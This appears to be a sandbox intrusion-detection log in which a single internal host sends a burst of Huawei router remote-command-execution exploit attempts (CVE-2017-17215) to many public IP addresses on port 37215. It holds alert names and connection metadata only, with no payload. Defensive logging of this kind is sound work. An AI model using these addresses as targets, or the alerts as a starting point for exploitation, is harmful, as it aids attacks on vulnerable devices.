                                                        06/13/24-21:33:02.952411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800837215192.168.2.14156.188.232.40
                                                        06/13/24-21:32:38.304092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128237215192.168.2.1441.243.232.47
                                                        06/13/24-21:32:48.553324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256237215192.168.2.1441.76.235.210
                                                        06/13/24-21:32:36.268590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216037215192.168.2.14197.247.223.131
                                                        06/13/24-21:32:28.045500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966437215192.168.2.14156.107.233.158
                                                        06/13/24-21:32:42.421138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882837215192.168.2.1441.72.30.70
                                                        06/13/24-21:32:05.350062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553637215192.168.2.1441.187.49.243
                                                        06/13/24-21:33:13.227491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392837215192.168.2.14197.87.160.249
                                                        06/13/24-21:32:36.243236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140637215192.168.2.1441.165.226.201
                                                        06/13/24-21:32:23.837133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091637215192.168.2.1441.208.73.22
                                                        06/13/24-21:31:59.177708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497037215192.168.2.14197.235.39.79
                                                        06/13/24-21:32:36.246211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068837215192.168.2.14197.33.150.32
                                                        06/13/24-21:32:34.192136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302837215192.168.2.1441.232.178.42
                                                        06/13/24-21:33:13.213189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.14156.32.67.135
                                                        06/13/24-21:32:25.996513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802037215192.168.2.14197.193.9.248
                                                        06/13/24-21:32:38.317025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944237215192.168.2.1441.101.45.220
                                                        06/13/24-21:32:52.670892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598237215192.168.2.14197.27.132.230
                                                        06/13/24-21:31:59.196717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239637215192.168.2.1441.172.177.215
                                                        06/13/24-21:31:57.134340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058637215192.168.2.1441.49.155.193
                                                        06/13/24-21:32:30.125674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651437215192.168.2.14197.45.191.110
                                                        06/13/24-21:32:46.503467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493437215192.168.2.14156.63.84.228
                                                        06/13/24-21:32:50.630150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080637215192.168.2.1441.191.206.97
                                                        06/13/24-21:32:56.785574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494637215192.168.2.14197.41.182.215
                                                        06/13/24-21:32:23.935868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.14197.222.76.213
                                                        06/13/24-21:32:07.403813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6039437215192.168.2.14197.211.186.212
                                                        06/13/24-21:33:09.091048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809837215192.168.2.14197.147.38.238
                                                        06/13/24-21:32:03.274294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445037215192.168.2.14156.29.70.149
                                                        06/13/24-21:32:05.349218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045837215192.168.2.14197.179.243.163
                                                        06/13/24-21:32:01.224449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.14156.29.211.164
                                                        06/13/24-21:32:11.487767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362637215192.168.2.14156.53.9.72
                                                        06/13/24-21:33:13.229829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066037215192.168.2.1441.140.91.69
                                                        06/13/24-21:32:07.402301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763837215192.168.2.14156.56.18.174
                                                        06/13/24-21:32:23.834815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006237215192.168.2.1441.21.240.191
                                                        06/13/24-21:31:59.173893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504837215192.168.2.1441.128.90.49
                                                        06/13/24-21:32:48.572827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746637215192.168.2.14197.163.186.24
                                                        06/13/24-21:32:44.453289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429437215192.168.2.14156.176.187.177
                                                        06/13/24-21:33:07.040720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413637215192.168.2.1441.224.253.81
                                                        06/13/24-21:31:59.198142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264237215192.168.2.1441.2.128.246
                                                        06/13/24-21:32:09.439108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863237215192.168.2.14156.19.118.202
                                                        06/13/24-21:32:17.697728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.14156.23.251.122
                                                        06/13/24-21:32:17.697053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083437215192.168.2.14156.110.41.29
                                                        06/13/24-21:32:56.754929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.1441.207.124.48
                                                        06/13/24-21:32:40.373881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255637215192.168.2.1441.101.63.108
                                                        06/13/24-21:32:52.678763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14156.39.90.168
                                                        06/13/24-21:33:09.128269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424037215192.168.2.14156.19.157.194
                                                        06/13/24-21:33:07.059688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564637215192.168.2.1441.32.139.222
                                                        06/13/24-21:33:04.987857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015237215192.168.2.1441.119.128.50
                                                        06/13/24-21:33:09.110094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14197.22.46.88
                                                        06/13/24-21:32:19.750587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008637215192.168.2.14197.125.216.233
                                                        06/13/24-21:31:59.177482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298037215192.168.2.1441.169.161.144
                                                        06/13/24-21:32:54.707847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435237215192.168.2.14156.195.87.35
                                                        06/13/24-21:32:42.407798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989437215192.168.2.14197.48.12.212
                                                        06/13/24-21:32:03.300304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462237215192.168.2.1441.92.153.193
                                                        06/13/24-21:32:40.355337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362837215192.168.2.14197.101.182.55
                                                        06/13/24-21:32:48.554372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685637215192.168.2.14197.106.109.58
                                                        06/13/24-21:33:09.127919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421837215192.168.2.1441.156.228.40
                                                        06/13/24-21:32:32.153028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052637215192.168.2.14156.109.196.19
                                                        06/13/24-21:32:38.316995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788237215192.168.2.14156.141.69.22
                                                        06/13/24-21:32:38.320061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695437215192.168.2.14156.182.61.101
                                                        06/13/24-21:32:21.786467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897837215192.168.2.14197.39.148.29
                                                        06/13/24-21:33:17.309627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.1441.242.159.117
                                                        06/13/24-21:32:25.995407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045037215192.168.2.1441.207.58.159
                                                        06/13/24-21:32:32.170206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602837215192.168.2.14156.90.189.151
                                                        06/13/24-21:32:05.346214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201237215192.168.2.1441.11.175.229
                                                        06/13/24-21:32:21.801980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528637215192.168.2.1441.231.245.254
                                                        06/13/24-21:32:54.726189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744237215192.168.2.14197.6.188.115
                                                        06/13/24-21:32:48.571656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774637215192.168.2.1441.168.83.214
                                                        06/13/24-21:32:11.488196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386437215192.168.2.14156.55.230.135
                                                        06/13/24-21:32:23.831915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235837215192.168.2.14197.220.181.235
                                                        06/13/24-21:33:02.914019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424237215192.168.2.1441.234.110.195
                                                        06/13/24-21:32:19.731753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669037215192.168.2.1441.240.190.167
                                                        06/13/24-21:32:32.164336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634237215192.168.2.14156.139.167.129
                                                        06/13/24-21:32:25.995735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252437215192.168.2.14156.6.180.192
                                                        06/13/24-21:33:07.041880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677237215192.168.2.14156.230.234.101
                                                        06/13/24-21:32:11.488340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417837215192.168.2.14156.221.243.231
                                                        06/13/24-21:32:30.077266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284037215192.168.2.1441.112.25.102
                                                        06/13/24-21:32:28.043563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562037215192.168.2.1441.175.191.178
                                                        06/13/24-21:32:36.264683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698437215192.168.2.14156.53.62.234
                                                        06/13/24-21:32:34.213880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959637215192.168.2.14156.114.228.220
                                                        06/13/24-21:33:09.111889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161837215192.168.2.14197.28.117.136
                                                        06/13/24-21:32:15.609352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667637215192.168.2.1441.174.224.22
                                                        06/13/24-21:32:44.456947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764837215192.168.2.14197.72.114.108
                                                        06/13/24-21:32:01.221592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867437215192.168.2.1441.170.24.175
                                                        06/13/24-21:32:32.155252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.14197.1.182.230
                                                        06/13/24-21:32:07.403194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459837215192.168.2.14156.107.165.231
                                                        06/13/24-21:32:30.126759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317037215192.168.2.14197.46.143.193
                                                        06/13/24-21:33:04.993494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699037215192.168.2.14156.119.207.12
                                                        06/13/24-21:32:17.676900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760437215192.168.2.14156.159.161.192
                                                        06/13/24-21:32:19.750619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076037215192.168.2.14156.252.55.84
                                                        06/13/24-21:32:44.451941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033037215192.168.2.1441.189.200.119
                                                        06/13/24-21:32:09.440282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809437215192.168.2.1441.243.185.159
                                                        06/13/24-21:32:58.844172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.14156.49.223.39
                                                        06/13/24-21:32:21.782195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483037215192.168.2.14156.240.122.218
                                                        06/13/24-21:33:13.212610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438437215192.168.2.1441.165.166.99
                                                        06/13/24-21:33:15.258327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.1441.178.254.182
                                                        06/13/24-21:31:57.132332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089437215192.168.2.14156.56.194.112
                                                        06/13/24-21:32:58.843955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326837215192.168.2.14156.4.100.25
                                                        06/13/24-21:32:07.403386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921637215192.168.2.14197.125.211.99
                                                        06/13/24-21:32:36.262473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249837215192.168.2.1441.61.8.118
                                                        06/13/24-21:32:23.836728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444437215192.168.2.14156.45.13.73
                                                        06/13/24-21:32:25.995897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605037215192.168.2.14197.207.195.187
                                                        06/13/24-21:32:54.727177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321837215192.168.2.1441.75.188.163
                                                        06/13/24-21:32:32.150414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460037215192.168.2.14156.85.174.248
                                                        06/13/24-21:33:17.306609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147037215192.168.2.14197.159.69.220
                                                        06/13/24-21:31:57.130988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142237215192.168.2.14197.47.117.170
                                                        06/13/24-21:32:03.275651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868237215192.168.2.1441.97.40.48
                                                        06/13/24-21:32:01.223062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655637215192.168.2.1441.208.29.174
                                                        06/13/24-21:32:38.301447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431037215192.168.2.1441.236.221.103
                                                        06/13/24-21:33:17.307438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342237215192.168.2.1441.90.14.215
                                                        06/13/24-21:32:56.785485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866837215192.168.2.1441.102.241.148
                                                        06/13/24-21:33:00.886149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868637215192.168.2.1441.53.151.216
                                                        06/13/24-21:32:40.358390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954837215192.168.2.14197.162.59.118
                                                        06/13/24-21:33:02.913261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296637215192.168.2.14156.40.228.110
                                                        06/13/24-21:32:13.543479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279037215192.168.2.1441.159.180.166
                                                        06/13/24-21:32:42.407260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685237215192.168.2.1441.147.171.180
                                                        06/13/24-21:32:03.294852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310437215192.168.2.14197.246.186.62
                                                        06/13/24-21:31:59.198314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883037215192.168.2.14156.115.1.221
                                                        06/13/24-21:33:00.871701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630637215192.168.2.14156.74.166.147
                                                        06/13/24-21:33:13.231198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4389437215192.168.2.14197.93.211.207
                                                        06/13/24-21:32:11.486585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198437215192.168.2.14197.130.38.40
                                                        06/13/24-21:33:09.110311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128037215192.168.2.1441.127.53.91
                                                        06/13/24-21:33:13.214520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717437215192.168.2.14197.181.155.248
                                                        06/13/24-21:32:32.167543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859037215192.168.2.14197.224.2.47
                                                        06/13/24-21:32:21.784599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480837215192.168.2.1441.110.30.231
                                                        06/13/24-21:32:50.617702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987237215192.168.2.1441.215.249.15
                                                        06/13/24-21:32:56.791678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754037215192.168.2.14197.181.27.18
                                                        06/13/24-21:33:00.886337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224237215192.168.2.14197.249.126.39
                                                        06/13/24-21:32:19.752181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108037215192.168.2.1441.133.97.107
                                                        06/13/24-21:32:44.480279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940237215192.168.2.14197.161.15.200
                                                        06/13/24-21:32:09.460143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704637215192.168.2.14156.243.42.86
                                                        06/13/24-21:32:30.094100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673037215192.168.2.1441.156.5.238
                                                        06/13/24-21:31:57.131212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594837215192.168.2.14156.89.186.115
                                                        06/13/24-21:32:07.404491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291437215192.168.2.1441.62.184.101
                                                        06/13/24-21:32:48.569291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193837215192.168.2.1441.207.11.67
                                                        06/13/24-21:32:07.404343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842437215192.168.2.1441.141.234.51
                                                        06/13/24-21:32:09.439480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295437215192.168.2.1441.224.95.126
                                                        06/13/24-21:32:21.785930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432437215192.168.2.14197.122.8.34
                                                        06/13/24-21:32:34.195779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399837215192.168.2.14197.110.168.242
                                                        06/13/24-21:32:54.708302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805837215192.168.2.14197.237.3.78
                                                        06/13/24-21:32:13.568246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951237215192.168.2.14197.97.200.149
                                                        06/13/24-21:32:28.044882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797237215192.168.2.14156.114.110.136
                                                        06/13/24-21:32:56.757086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172037215192.168.2.1441.99.129.130
                                                        06/13/24-21:32:11.505459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915037215192.168.2.14156.60.144.103
                                                        06/13/24-21:33:13.229409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936437215192.168.2.14197.42.137.61
                                                        06/13/24-21:32:58.819931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.14156.194.222.51
                                                        06/13/24-21:32:30.096606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838237215192.168.2.14156.156.71.26
                                                        06/13/24-21:32:42.424169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178237215192.168.2.14197.88.14.95
                                                        06/13/24-21:32:44.451858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986037215192.168.2.14197.235.178.116
                                                        06/13/24-21:32:56.757492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601037215192.168.2.14156.154.234.60
                                                        06/13/24-21:32:11.506293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625637215192.168.2.14197.27.110.82
                                                        06/13/24-21:32:25.969406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659837215192.168.2.14197.209.143.202
                                                        06/13/24-21:32:50.609923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397237215192.168.2.14156.69.4.8
                                                        06/13/24-21:32:50.610904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297637215192.168.2.14156.83.136.91
                                                        06/13/24-21:32:56.757610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133237215192.168.2.1441.229.239.79
                                                        06/13/24-21:32:15.636123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950637215192.168.2.14156.62.32.122
                                                        06/13/24-21:32:56.785953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339437215192.168.2.1441.77.242.102
                                                        06/13/24-21:33:13.227741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820037215192.168.2.14197.62.137.42
                                                        06/13/24-21:32:28.045343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460037215192.168.2.14156.20.37.112
                                                        06/13/24-21:32:44.474862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604037215192.168.2.14197.34.234.153
                                                        06/13/24-21:33:11.173449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918837215192.168.2.1441.78.222.118
                                                        06/13/24-21:32:17.696971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801837215192.168.2.14197.147.22.14
                                                        06/13/24-21:32:50.613466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518637215192.168.2.14156.20.81.196
                                                        06/13/24-21:33:02.937476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144437215192.168.2.14197.134.222.86
                                                        06/13/24-21:33:00.872079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009837215192.168.2.14197.221.155.148
                                                        06/13/24-21:32:11.489092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402437215192.168.2.14197.189.141.16
                                                        06/13/24-21:32:21.803612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930637215192.168.2.14156.13.22.65
                                                        06/13/24-21:32:34.217257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959037215192.168.2.14197.130.220.87
                                                        06/13/24-21:32:32.169333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324237215192.168.2.14156.37.144.17
                                                        06/13/24-21:32:28.027564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002837215192.168.2.14197.125.140.233
                                                        06/13/24-21:32:25.977831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077237215192.168.2.14197.123.199.135
                                                        06/13/24-21:32:19.730772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873837215192.168.2.14197.16.171.126
                                                        06/13/24-21:32:23.936964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571437215192.168.2.14197.213.96.141
                                                        06/13/24-21:32:48.555553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893037215192.168.2.1441.1.53.67
                                                        06/13/24-21:32:30.076788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591637215192.168.2.14156.9.181.133
                                                        06/13/24-21:33:15.276773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975637215192.168.2.14156.191.135.61
                                                        06/13/24-21:32:34.213540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897037215192.168.2.1441.181.252.134
                                                        06/13/24-21:33:15.256289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951037215192.168.2.14156.37.65.103
                                                        06/13/24-21:32:21.787877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447437215192.168.2.14197.9.10.228
                                                        06/13/24-21:32:13.544605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484037215192.168.2.14156.155.225.209
                                                        06/13/24-21:32:03.274983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217837215192.168.2.14156.143.125.114
                                                        06/13/24-21:32:09.437527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803637215192.168.2.14156.90.30.230
                                                        06/13/24-21:32:30.126440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938837215192.168.2.14156.116.129.42
                                                        06/13/24-21:32:44.474066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150637215192.168.2.1441.92.132.174
                                                        06/13/24-21:32:30.078983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867637215192.168.2.14156.157.145.251
                                                        06/13/24-21:32:50.630904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987437215192.168.2.14156.94.206.41
                                                        06/13/24-21:32:38.299990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586037215192.168.2.1441.247.187.210
